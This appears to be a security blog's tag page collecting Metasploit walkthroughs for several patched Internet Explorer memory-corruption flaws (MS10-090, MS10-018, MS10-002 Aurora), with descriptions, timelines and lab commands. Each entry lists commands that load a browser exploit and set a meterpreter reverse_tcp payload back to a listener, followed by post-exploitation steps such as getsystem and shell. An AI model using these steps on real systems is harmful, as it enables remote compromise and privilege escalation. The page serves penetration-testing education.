aka wow on ZATAZ.com
Posts tagged Internet Explorer
Metasploit Exploitation Scenarios – Scenario 1
01 year ago
in Metasploit
Here is the first scenario of the Metasploit Exploitation Scenarios serie. You will find here under a SlideShare presentation and an YouTube video as demonstration of the scenario. If you have any comments or suggestions don’t hesitate.
MS10-090 : Microsoft Internet Explorer CSS Tags Memory Corruption
01 year ago
in Exploits, Metasploit
PoC provided by :
unknown
Matteo Memelli
jduck
Reference(s) :
CVE-2010-3962
MSA-2458511
MS10-090
Affected version(s) :
Internet Explorer 6, 7 & 8
Tested on Windows XP SP3 with :
Internet Explorer 6 (mshtml.dll 6.0.2900.5512)
Description :
This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead arbitrary code execution. It seems like Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtable’s function pointers. This leads to the program counter being set to the address determined by the address “[vtable+0x30+1]“. The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable. Specifically, those ending up with a program counter value within another module, in kernel space, or just not able to be reached with various memory spraying techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to bypass non-executable memory protections.
Commands :
use exploit/windows/browser/ms10_xxx_ie_css_clip
set SRVHOST 192.168.178.21
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
getuid
getsystem
shell
MS10-018 : Microsoft Internet Explorer DHTML Behaviors Use After Free
01 year ago
in Exploits, Metasploit
Timeline :
Microsoft MSA981374 advisory release the 2010-03-09
Exploit-DB PoC provided by Trancer the 2010-03-10
Metasploit PoC provided by duck the 2010-03-10
Microsoft patch “KB980182″ provided the 2010-03-30
PoC provided by :
unknown
Trancer
Nanika
jduck
Reference(s) :
Affected version(s) :
Internet Explorer 6
Internet Explorer 7
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB980182
Description :
This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the “iepeers” vulnerability. The name comes from Microsoft’s suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object.” NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected
Commands :
use windows/browser/ms10_018_ie_behaviors
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
sysinfo
getuid
ipconfig
MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption
01 year ago
in Exploits, Metasploit
Timeline :
Vulnerability privately disclosed to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB980182″ provided the 2010-03-30
Metasploit PoC provided by jduck the 2010-04-05
PoC provided by :
Anonymous
jduck
Reference(s) :
Affected version(s) :
Internet Explorer 5
Internet Explorer 6
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB980182
Description :
This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the “DataURL” parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.
Commands :
use windows/browser/ms10_018_ie_tabular_activex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
sysinfo
getuid
ipconfig
MS10-002 : Internet Explorer Aurora Memory Corruption
01 year ago
in Exploits, Metasploit
Timeline :
Vulnerability learned by Microsoft the 2010-01-13
Metasploit PoC provided by hdm the 2010-01-15
Exploit-DB PoC provided by Ahmed Obied the 2010-01-17
Microsoft patch “KB978207″ provided the 2010-01-21
PoC provided by :
unknown
hdm
Reference(s) :
Affected version(s) :
Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB978207
Description :
This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the Operation Aurora attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
Commands :
use exploit/windows/browser/ms10_002_aurora
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
sysinfo
getuid
ipconfig
Recent Comments